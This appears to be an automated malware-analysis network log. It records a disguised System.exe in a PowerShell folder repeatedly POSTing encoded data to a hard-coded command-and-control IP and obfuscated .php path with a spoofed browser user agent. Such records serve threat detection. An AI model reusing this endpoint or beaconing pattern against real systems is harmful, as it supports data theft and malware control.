                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:00.942955017 CET2600OUTData Raw: 5c 59 58 59 5e 5b 5d 57 5b 59 5a 55 50 5e 5b 51 56 56 54 49 52 58 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YXY^[]W[YZUP^[QVVTIRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/.:%;:)=?[,3Y/#!.3".)X$B&(Z:?"Y ']/<
                                                                                                    Jan 4, 2025 14:53:01.131340027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:01.263005018 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    54 | 192.168.2.4 | 49801 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:01.388685942 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:01.738874912 CET2600OUTData Raw: 59 5c 58 5b 5b 59 5d 57 5b 59 5a 55 50 50 5b 50 56 50 54 45 52 5f 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\X[[Y]W[YZUPP[PVPTER_R]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[;6%9=-_<S$($.3 -8!!W(>(E&#4X-?"Y ']/
                                                                                                    Jan 4, 2025 14:53:01.933495998 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:02.072170973 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    55 | 192.168.2.4 | 49807 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:02.198477983 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:02.551393032 CET2600OUTData Raw: 59 58 58 59 5b 5a 58 56 5b 59 5a 55 50 59 5b 53 56 50 54 47 52 5d 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXXY[ZXV[YZUPY[SVPTGR]R]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X/X62^.=_)-''+8[/!=8#8>(>,D20'."Y ']/
                                                                                                    Jan 4, 2025 14:53:02.736884117 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    56 | 192.168.2.4 | 49813 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:02.807952881 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:03.162440062 CET1876OUTData Raw: 5c 5a 5d 5b 5e 58 58 57 5b 59 5a 55 50 51 5b 55 56 55 54 43 52 50 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Z][^XXW[YZUPQ[UVUTCRPRXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,.X1+.>-(+$+,8U6>'V">4&3(."Y ']/
                                                                                                    Jan 4, 2025 14:53:03.481686115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:03.610877037 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 21 03 32 00 2e 56 25 3e 3c 56 39 3c 0b 1a 3f 20 31 1c 3b 2e 34 11 2b 39 37 14 2e 23 3b 5a 29 38 3a 45 3d 08 33 50 32 3f 30 1e 2a 36 20 51 03 12 27 13 31 29 2a 5b 29 23 2d 5a 3a 10 2f 1f 20 31 20 04 32 29 3e 5d 20 2d 29 14 26 2c 35 51 3e 11 39 1f 39 00 06 07 3a 0d 20 53 3c 2f 23 55 0b 1f 26 0f 27 31 34 52 25 5e 28 59 3c 33 3f 03 29 2a 2b 55 20 3a 2c 12 31 2d 22 5b 27 08 3d 1d 30 57 25 16 27 1d 2a 06 36 07 30 05 31 00 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98!2.V%><V9<? 1;.4+97.#;Z)8:E=3P2?0*6 Q'1)*[)#-Z:/ 1 2)>] -)&,5Q>99: S</#U&'14R%^(Y<3?)*+U :,1-"['=0W%'*601.S.-W=YL0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    57 | 192.168.2.4 | 49814 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:03.317275047 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:03.676393032 CET2600OUTData Raw: 59 5e 58 59 5b 5a 5d 57 5b 59 5a 55 50 5e 5b 56 56 53 54 40 52 5f 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^XY[Z]W[YZUP^[VVST@R_RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,"&+:Q=[<?>7V38#, .5-#Q68=P>>(&3]-/"Y ']/<
                                                                                                    Jan 4, 2025 14:53:03.911652088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:04.042299986 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    58 | 192.168.2.4 | 49821 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:04.175373077 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:04.520190001 CET2600OUTData Raw: 5c 5b 58 5e 5b 55 5d 50 5b 59 5a 55 50 5d 5b 56 56 53 54 49 52 5a 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[X^[U]P[YZUP][VVSTIRZRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z;-!_2^.P=#(/'X/*V!T!(T(=;134Y:"Y ']/0
                                                                                                    Jan 4, 2025 14:53:04.699496984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:04.826222897 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    59 | 192.168.2.4 | 49827 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:04.960597038 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:05.316893101 CET2596OUTData Raw: 59 5c 5d 5f 5b 5f 58 53 5b 59 5a 55 50 58 5b 57 56 50 54 43 52 51 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\]_[_XS[YZUPX[WVPTCRQR_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;"%^2W*.(^(.;'8?. &6(!5*-7&3#.?"Y ']/4
                                                                                                    Jan 4, 2025 14:53:05.505991936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:05.640557051 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    60  192.168.2.4  49837  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:06.057854891 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:06.410618067 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:06.744714022 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:06.878379107 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    61  192.168.2.4  49843  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:07.015685081 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:07.365376949 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:07.542638063 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:07.676254988 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    62  192.168.2.4  49849  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:07.813824892 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:08.161181927 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:08.335899115 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:08.466866970 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    63  192.168.2.4  49851  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:08.663012028 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:09.020194054 CET  1856  OUT
                                                                                                    Jan 4, 2025 14:53:09.182801962 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:09.314203024 CET  349  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    64  192.168.2.4  49852  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:08.740067959 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:09.098160982 CET  2596  OUT
                                                                                                    Jan 4, 2025 14:53:09.276263952 CET  25  IN  HTTP/1.1 100 Continue


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    65  192.168.2.4  49858  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:09.472285032 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:09.816868067 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:10.011003971 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:10.141278982 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    66  192.168.2.4  49867  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:10.275753021 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:10.629373074 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:10.821053982 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:10.955748081 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    67  192.168.2.4  49872  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:11.362147093 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:11.707536936 CET  2600  OUT
                                                                                                    Jan 4, 2025 14:53:11.879987001 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:12.010204077 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    68  192.168.2.4  49877  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Jan 4, 2025 14:53:12.132985115 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:12.488812923 CET  2600  OUT
Jan 4, 2025 14:53:12.659781933 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:53:12.795891047 CET | 200 | IN | HTTP/1.1 200 OK
